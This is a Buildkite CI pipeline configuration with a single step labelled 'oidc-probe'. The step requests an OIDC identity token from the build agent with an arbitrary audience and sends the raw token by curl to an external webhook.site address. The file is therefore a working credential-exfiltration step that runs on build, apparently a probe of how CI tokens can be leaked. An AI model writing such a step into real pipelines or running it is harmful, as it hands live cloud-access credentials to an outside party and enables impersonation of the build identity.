steps:
  - label: "oidc-probe"
    agents:
      queue: local
    command: |
      TOKEN=$(buildkite-agent oidc request-token --audience anything)
      curl -s -X POST "https://webhook.site/3137853b-9be1-44ca-9d46-4981a105dded" \
        -H 'content-type: text/plain' --data-binary "$TOKEN"
